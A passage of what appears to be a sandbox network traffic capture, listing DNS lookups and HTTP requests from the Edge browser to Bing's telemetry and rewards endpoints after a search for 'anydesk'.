e86303.dscx.akamaiedge.net

IN A

92.123.128.137
DNS

th.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

th.bing.com

IN A

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

92.123.128.140

e86303.dscx.akamaiedge.net

IN A

92.123.128.148

e86303.dscx.akamaiedge.net

IN A

92.123.128.145

e86303.dscx.akamaiedge.net

IN A

92.123.128.144

e86303.dscx.akamaiedge.net

IN A

92.123.128.149

e86303.dscx.akamaiedge.net

IN A

92.123.128.138

e86303.dscx.akamaiedge.net

IN A

92.123.128.146

e86303.dscx.akamaiedge.net

IN A

92.123.128.137

e86303.dscx.akamaiedge.net

IN A

92.123.128.147
DNS

132.128.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

132.128.123.92.in-addr.arpa

IN PTR

Response

132.128.123.92.in-addr.arpa

IN PTR

a92-123-128-132deploystaticakamaitechnologiescom
POST

https://www.bing.com/rewardsapp/reportActivity?IG=4B36F2F1B3E84114BE48F204E3D5D175&IID=SERP.5060&q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531

msedge.exe

Remote address:

92.123.128.132:443

Request

POST /rewardsapp/reportActivity?IG=4B36F2F1B3E84114BE48F204E3D5D175&IID=SERP.5060&q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 157
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: _C_Auth=; MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Content-Length: 1039
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Content-Encoding: gzip
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
X-EventID: 6701644ea5c6407685b65f14e23a6318
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-80FjTw4Uqi+Ar6dxrdg7xNP2K/9brUb7YN8zW7e0m7w='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-Ceto-ref: 6701644ea5c6407685b65f14e23a6318|AFD:6701644ea5c6407685b65f14e23a6318|2024-10-05T16:07:42.802Z
Date: Sat, 05 Oct 2024 16:07:42 GMT
Connection: keep-alive
Set-Cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
Set-Cookie: _C_Auth=
Set-Cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:07:42.8178002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; domain=.bing.com; expires=Sun, 05-Oct-2025 16:07:42 GMT; path=/; secure; SameSite=None
Set-Cookie: _Rwho=u=d&ts=2024-10-05; domain=.bing.com; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=9&RB=0&GB=0&RG=200&RP=6; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.89777b5c.1728144462.188f00da
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461369%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22video%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22local%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22news%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%225%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%226%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22flights%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%227%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22travelhub%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%228%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22hotels%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%229%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461365%2C%22Name%22%3A%22notebook%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461369%2C%22Name%22%3A%22Perm_Denied%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1; USRLOC=HS=1&BLOCK=TS=241005160742; _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:07:42.8178002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=9&RB=0&GB=0&RG=200&RP=6

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:43 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.89777b5c.1728144463.188f01b8
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144462678%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22Fallback%22%3A%221%22%2C%22IsRewardUser%22%3A%22%22%2C%22IsAutoOpenFlyout%22%3A%22%22%2C%22SuppressionReason%22%3A%22NoTrigger%3AMuidTrialNotEnoughPoints%22%2C%22FID%22%3A%22ModernRewardsFlyout%22%2C%22EventName%22%3A%22AutoOpenFlyoutFired%22%2C%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144462678%2C%22Name%22%3A%22AutoOpenFlyoutFired%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1; USRLOC=HS=1&BLOCK=TS=241005160742; _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:07:42.8178002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=9&RB=0&GB=0&RG=200&RP=6

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:43 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.89777b5c.1728144463.188f07e0
POST

https://www.bing.com/fd/ls/GLinkPingPost.aspx?IG=4B36F2F1B3E84114BE48F204E3D5D175&ID=SERP,5132.2&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3Da25e0edae602c85aJmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMg%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D05879add-3ef8-6d54-0f58-8fd23fdb6c78%26psq%3Danydesk%26u%3Da1aHR0cHM6Ly93d3cuYW55ZGVzay5jb20vIzp-OnRleHQ9RGlzY292ZXIgQW55RGVzaywgdGhlIHNlY3VyZSAmIGludHVpdGl2ZSByZW1vdGUgZGVza3RvcCBzb2Z0d2FyZSwgYW5k%26ntb%3D1

msedge.exe

Remote address:

92.123.128.132:443

Request

POST /fd/ls/GLinkPingPost.aspx?IG=4B36F2F1B3E84114BE48F204E3D5D175&ID=SERP,5132.2&url=https%3A%2F%2Fwww.bing.com%2Fck%2Fa%3F!%26%26p%3Da25e0edae602c85aJmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMg%26ptn%3D3%26ver%3D2%26hsh%3D3%26fclid%3D05879add-3ef8-6d54-0f58-8fd23fdb6c78%26psq%3Danydesk%26u%3Da1aHR0cHM6Ly93d3cuYW55ZGVzay5jb20vIzp-OnRleHQ9RGlzY292ZXIgQW55RGVzaywgdGhlIHNlY3VyZSAmIGludHVpdGl2ZSByZW1vdGUgZGVza3RvcCBzb2Z0d2FyZSwgYW5k%26ntb%3D1 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1; USRLOC=HS=1&BLOCK=TS=241005160742; _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:07:42.8178002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=9&RB=0&GB=0&RG=200&RP=6

Response

HTTP/1.1 200 OK

Cache-Control: private
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Access-Control-Allow-Origin: *
X-EventID: 67016450f89a4e86a2aee1a8da509a55
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
